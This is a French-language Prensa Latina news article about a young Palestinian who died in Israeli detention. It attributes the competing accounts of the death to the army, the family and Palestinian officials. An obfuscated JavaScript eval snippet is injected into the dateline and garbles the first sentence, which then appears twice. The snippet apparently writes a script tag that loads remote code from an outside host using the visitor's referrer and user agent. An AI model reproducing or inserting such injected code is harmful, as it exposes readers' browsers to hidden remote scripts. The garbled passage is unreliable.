lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Un jeune palestinien meurt lors de sa détention par la police israélienne

Ramallah, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|snrhf|var|u0026u|referrer|hikst||js|php'.split('|'),0,{})) 22 février (Prensa Latina) Un jeune palestinien est aujourd´hui décédé quelques heures après avoir été arrêté par les autorités israéliennes et alors qu´il se trouvait en détention.

Ramallah, 22 février (Prensa Latina) Un jeune palestinien est aujourd´hui décédé quelques heures après avoir été arrêté par les autorités israéliennes et alors qu´il se trouvait en détention.

Selon la Société Palestinienne de Prisonniers (PPS), l´armée israélienne a informé la famille de Yasin Omar Saradeeh de sa mort lors de sa détention, alléguant qu´il avait eu des convulsions après avoir inhalé du gaz lacrymogène tiré par les effectifs de Tel-Aviv au moment de la répression de manifestations à Jéricho.

Cependant, la famille de la victime, tout comme les témoins présents, assurent que les forces israéliennes ont sévèrement frappé le jeune homme avant de le détenir, et qu´il « était en bonne état de santé avant son arrestation ».

Selon Issa Qaraqe, chef de la Commission des Détenus de l´Autorité Palestinienne, Saradeeh est apparemment décédé suite à de forts coups reçus à la tête.

Le fonctionnaire a exprimé le fait que « cet incident constitue l´un des cas d´exécution préméditée extrajudiciaire par les forces d´occupation », ce qui reflète selon lui « le niveau de brutalité et de terrorisme des soldats israéliens ».

Il a ensuite expliqué que l´autopsie aura lieu à l´Institut Médico-légal d´Abu Kabir d´Israël, à laquelle assistera un légiste palestinien, puis qu´une seconde aurait postérieurement lieu dans un hôpital palestinien lorsque Tel-Aviv rendra le corps de Saradeeh à sa famille.

peo/tgj/Mv

EN CONTINU
notes connexes